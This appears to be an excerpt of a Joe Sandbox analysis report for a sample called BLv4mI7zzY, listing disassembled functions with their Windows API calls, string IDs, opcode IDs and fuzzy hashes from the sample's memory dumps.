                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 1536045017-1403004172
                                                              • Opcode ID: a59f3515d38f59a70039aad1afd6e1cf908ea9b20e73abf69f2c7bcc0d9ebbb8
                                                              • Instruction ID: 4827877aeb4097e2f04d8ff510d4ca282f3379f49608db35cfba4bb1d4166000
                                                              • Opcode Fuzzy Hash: a59f3515d38f59a70039aad1afd6e1cf908ea9b20e73abf69f2c7bcc0d9ebbb8
                                                              • Instruction Fuzzy Hash: 1A21F574A00108BBDF15BBA5CC89EFEBB74EF48300F54052BB955972A1DB79481ADB28
                                                              APIs
                                                              • GetParent.USER32 ref: 0048916F
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00489184
                                                              • _wcscmp.LIBCMT ref: 00489196
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00489211
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1704125052-3381328864
                                                              • Opcode ID: ccd08efe1cbeeb0425dc0c62e0051d541029b762dc9c7bc51727f30f2e304f34
                                                              • Instruction ID: 0ee97c28f86f63f39701a342d2d5fe4a96fefde76c35ce640c92939f30b76d44
                                                              • Opcode Fuzzy Hash: ccd08efe1cbeeb0425dc0c62e0051d541029b762dc9c7bc51727f30f2e304f34
                                                              • Instruction Fuzzy Hash: 0F11C476248707BAFA113625EC0BDBB379CAF15731B240867FD00A4092EEA96C565A5C
                                                              APIs
                                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00497A6C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ArraySafeVartype
                                                              • String ID:
                                                              • API String ID: 1725837607-0
                                                              • Opcode ID: 6b9177930767a8ae8cc7c5956e5e49ffaaf02c4e07ec7ccd2f98bf1ac6a452f4
                                                              • Instruction ID: c90c40b48ffb004aa04212abd5662e22d3a8ed71bd8ede1e22e075831c5eb0e8
                                                              • Opcode Fuzzy Hash: 6b9177930767a8ae8cc7c5956e5e49ffaaf02c4e07ec7ccd2f98bf1ac6a452f4
                                                              • Instruction Fuzzy Hash: 28B18C7191420A9FDF00DFA5C885BBEBBB4FF09325F24443AEA41E7241D738A945CB99
                                                              APIs
                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0043FAA6
                                                              • OleUninitialize.OLE32(?,00000000), ref: 0043FB45
                                                              • UnregisterHotKey.USER32(?), ref: 0043FC9C
                                                              • DestroyWindow.USER32(?), ref: 004745D6
                                                              • FreeLibrary.KERNEL32(?), ref: 0047463B
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00474668
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                              • String ID: close all
                                                              • API String ID: 469580280-3243417748
                                                              • Opcode ID: 8f2e389714c719354cbde0466c87489461989a47a496be925347cfd7fe0f3941
                                                              • Instruction ID: c93e8c73a206935f06161e1c9a4929b622329a824bd30310f2c7086d353670ad
                                                              • Opcode Fuzzy Hash: 8f2e389714c719354cbde0466c87489461989a47a496be925347cfd7fe0f3941
                                                              • Instruction Fuzzy Hash: 14A18070701112CFDB18EF15C594A7AF364BF49704F1192AEE80AAB261DB38ED1ACF59
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$_memset
                                                              • String ID: ,,L$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                              • API String ID: 2862541840-3251461710
                                                              • Opcode ID: 1745116bc69e7a6256ac1944d827be2a98610b6ea9b38935a84da3203d6f1998
                                                              • Instruction ID: 106afd92ef3d149491c11ccb718888e7db28ee803ef80a3478a06f0c0ca9b491
                                                              • Opcode Fuzzy Hash: 1745116bc69e7a6256ac1944d827be2a98610b6ea9b38935a84da3203d6f1998
                                                              • Instruction Fuzzy Hash: 8A91A171A00205ABDF24CFA5C848FAFB7B8EF5A714F10855EF915AB280D7789D05CBA4
                                                              APIs
                                                              • EnumChildWindows.USER32(?,0048A439), ref: 0048A377
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                              • API String ID: 3555792229-1603158881
                                                              • Opcode ID: 8ccf5cafc2f840ab9908447d017fa54ed45404d8816d7c47ad5801311b8957c0
                                                              • Instruction ID: f8cce6f26d0bb519663e957aada4590ad38596c3731b2e06af98dff9f7bd8672
                                                              • Opcode Fuzzy Hash: 8ccf5cafc2f840ab9908447d017fa54ed45404d8816d7c47ad5801311b8957c0
                                                              • Instruction Fuzzy Hash: 8591E971500605ABEB18EF61C441BEEFB74BF04314F54891FD849A3242DF7869A9CB99
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00432EAE
                                                                • Part of subcall function 00431DB3: GetClientRect.USER32(?,?), ref: 00431DDC
                                                                • Part of subcall function 00431DB3: GetWindowRect.USER32(?,?), ref: 00431E1D
                                                                • Part of subcall function 00431DB3: ScreenToClient.USER32(?,?), ref: 00431E45
                                                              • GetDC.USER32 ref: 0046CD32
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0046CD45
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0046CD53
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0046CD68
                                                              • ReleaseDC.USER32(?,00000000), ref: 0046CD70
                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0046CDFB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: f6829eb8c28ca72618bea72cdb5cb8397331e3606eb5845ab79b87593d1c0726
                                                              • Instruction ID: 555ef83e4edde3aa1e754d4e2cb4d8139add9b163542c6583f12ad6c90dc786d
                                                              • Opcode Fuzzy Hash: f6829eb8c28ca72618bea72cdb5cb8397331e3606eb5845ab79b87593d1c0726
                                                              • Instruction Fuzzy Hash: 0E71EF31400205DFCF219F64C8C5ABB3BB5FF48324F14427BED995A2A6E7398851DB6A
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004A1A50
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004A1A7C
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 004A1ABE
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004A1AD3
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004A1AE0
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004A1B10
                                                              • InternetCloseHandle.WININET(00000000), ref: 004A1B57
                                                                • Part of subcall function 004A2483: GetLastError.KERNEL32(?,?,004A1817,00000000,00000000,00000001), ref: 004A2498
                                                                • Part of subcall function 004A2483: SetEvent.KERNEL32(?,?,004A1817,00000000,00000000,00000001), ref: 004A24AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                              • String ID:
                                                              • API String ID: 2603140658-3916222277
                                                              • Opcode ID: 92ce41c535786ec1a08d87e8eb28ecb62585c6c4356754594061dba782b75099
                                                              • Instruction ID: e42324f03541d63cbb0ed2c060d53475139cf23b05308f4137e33f0e0e8be66b
                                                              • Opcode Fuzzy Hash: 92ce41c535786ec1a08d87e8eb28ecb62585c6c4356754594061dba782b75099
                                                              • Instruction Fuzzy Hash: D341A4B1501218BFEB118F50CC85FFB77ACEF19354F00816BFA059A251EB789E449BA8
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,004BF910), ref: 004A8D28
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,004BF910), ref: 004A8D5C
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004A8ED6
                                                              • SysFreeString.OLEAUT32(?), ref: 004A8F00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: 1c2705a7eec5de43eae12b3c4f64fef2b7b4bd3452a65c7a9fe7f4143691fd87
                                                              • Instruction ID: fbfa2eeb4cb250c0c30d3eb7055538ae77231c6102b3fa0ba83ad12c383b5abf
                                                              • Opcode Fuzzy Hash: 1c2705a7eec5de43eae12b3c4f64fef2b7b4bd3452a65c7a9fe7f4143691fd87
                                                              • Instruction Fuzzy Hash: 4FF15A71A00209EFCF04DF94C884EAEB7B9FF5A314F108599F905AB251DB35AE46CB94
                                                              APIs
                                                              • _memset.LIBCMT ref: 004AF6B5
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004AF848
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004AF86C
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004AF8AC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004AF8CE
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004AFA4A
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004AFA7C
                                                              • CloseHandle.KERNEL32(?), ref: 004AFAAB
                                                              • CloseHandle.KERNEL32(?), ref: 004AFB22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                              • String ID:
                                                              • API String ID: 4090791747-0
                                                              • Opcode ID: 5e4ae94f55ca4445e50c3714e3ddf58007f6899f8a2da63f736d0dd38e999c03
                                                              • Instruction ID: 01d4baad24bbea758a9f71c3ae030d7396091823cca758af5ae69e62a6485848
                                                              • Opcode Fuzzy Hash: 5e4ae94f55ca4445e50c3714e3ddf58007f6899f8a2da63f736d0dd38e999c03
                                                              • Instruction Fuzzy Hash: F1E1A2752042009FD714EF65C881B6BBBE0AF89314F14856EF8855B3A2CB78EC49CB5A
                                                              APIs
                                                                • Part of subcall function 0049466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00493697,?), ref: 0049468B
                                                                • Part of subcall function 0049466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00493697,?), ref: 004946A4
                                                                • Part of subcall function 00494A31: GetFileAttributesW.KERNEL32(?,0049370B), ref: 00494A32
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00494D40
                                                              • _wcscmp.LIBCMT ref: 00494D5A
                                                              • MoveFileW.KERNEL32(?,?), ref: 00494D75
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                              • String ID:
                                                              • API String ID: 793581249-0
                                                              • Opcode ID: 40ec60c5d89172179c62baa0c73c859f6f1a93c6e0397d0343d72f7dcc1fdf7b
                                                              • Instruction ID: 02f4b0af33c01b52723d1ef9ff725578b879ec4b80fe1c052499206262613e50
                                                              • Opcode Fuzzy Hash: 40ec60c5d89172179c62baa0c73c859f6f1a93c6e0397d0343d72f7dcc1fdf7b
                                                              • Instruction Fuzzy Hash: 495150B20083459BCB24DB61D881DDBB7ECAF85355F00092FF589D3152EE78A589C76A
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004B86FF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 8a16698c692735742b1c8c9b758ee880beddefec07d1c125135f009e86fb6069
                                                              • Instruction ID: 93cb306449ab088017a50df16e533b347f8aa1721a09fd89d536a40a10beafca
                                                              • Opcode Fuzzy Hash: 8a16698c692735742b1c8c9b758ee880beddefec07d1c125135f009e86fb6069
                                                              • Instruction Fuzzy Hash: 8D518230500244BFDB249F29DC85FEA7B68EB05358F60422FF914D62E1CF79A990DB69
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0046C2F7
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0046C319
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0046C331
                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0046C34F
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0046C370
                                                              • DestroyIcon.USER32(00000000), ref: 0046C37F
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0046C39C
                                                              • DestroyIcon.USER32(?), ref: 0046C3AB
                                                                • Part of subcall function 004BA4AF: DeleteObject.GDI32(00000000), ref: 004BA4E8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                              • String ID:
                                                              • API String ID: 2819616528-0
                                                              • Opcode ID: f5e096d241a22e8b84854543e9f1abd9eff4e2f384717b6aa85fe3b243109252
                                                              • Instruction ID: b845682ba52cbe2099b7f6e413486821a9c1f2fbf9ba10ec2f20347672cc22a1
                                                              • Opcode Fuzzy Hash: f5e096d241a22e8b84854543e9f1abd9eff4e2f384717b6aa85fe3b243109252
                                                              • Instruction Fuzzy Hash: 48519C70A00205EFDB20DF25CD85FAB7BA5EB18310F10452AF94697390D7B8EC91DB59
                                                              APIs
                                                                • Part of subcall function 0048A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0048A84C
                                                                • Part of subcall function 0048A82C: GetCurrentThreadId.KERNEL32 ref: 0048A853
                                                                • Part of subcall function 0048A82C: AttachThreadInput.USER32(00000000,?,00489683,?,00000001), ref: 0048A85A
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0048968E
                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004896AB
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004896AE
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004896B7
                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004896D5
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004896D8
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 004896E1
                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004896F8
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004896FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                              • String ID:
                                                              • API String ID: 2014098862-0
                                                              • Opcode ID: ea579811601a08eb02af81d8b853cb6caa0f1d50f955ab595c168d898536cf9c
                                                              • Instruction ID: 0ed2981d426ffc75dc19283de442eeac2d3d9667537285bd3921accce6904708
                                                              • Opcode Fuzzy Hash: ea579811601a08eb02af81d8b853cb6caa0f1d50f955ab595c168d898536cf9c
                                                              • Instruction Fuzzy Hash: 6511C2B1910618BFF6106B659C49F6A3B1DDB4C754F10092AF648AB0A0C9F25C119BA8
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0048853C,00000B00,?,?), ref: 0048892A
                                                              • HeapAlloc.KERNEL32(00000000,?,0048853C,00000B00,?,?), ref: 00488931
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0048853C,00000B00,?,?), ref: 00488946
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0048853C,00000B00,?,?), ref: 0048894E
                                                              • DuplicateHandle.KERNEL32(00000000,?,0048853C,00000B00,?,?), ref: 00488951
                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0048853C,00000B00,?,?), ref: 00488961
                                                              • GetCurrentProcess.KERNEL32(0048853C,00000000,?,0048853C,00000B00,?,?), ref: 00488969
                                                              • DuplicateHandle.KERNEL32(00000000,?,0048853C,00000B00,?,?), ref: 0048896C
                                                              • CreateThread.KERNEL32(00000000,00000000,00488992,00000000,00000000,00000000), ref: 00488986
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: 4d66477f17e594320993fccf4dfa755b4584192414850e6bca2a21dc87f95c5f
                                                              • Instruction ID: f8cf94899d591fe34c34746603da95fcba04ee3c0558e8072e66a841b771b602
                                                              • Opcode Fuzzy Hash: 4d66477f17e594320993fccf4dfa755b4584192414850e6bca2a21dc87f95c5f
                                                              • Instruction Fuzzy Hash: 0A01ACB5240304FFE610AFA9DC49F6B7B6CEB89711F404521FA09DB191CA759C048B24
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                              • API String ID: 0-572801152
                                                              • Opcode ID: 8f628fc233c65f8b47b59e62365f4839cabc64f7022ad398a47e72e9e8b72b7a
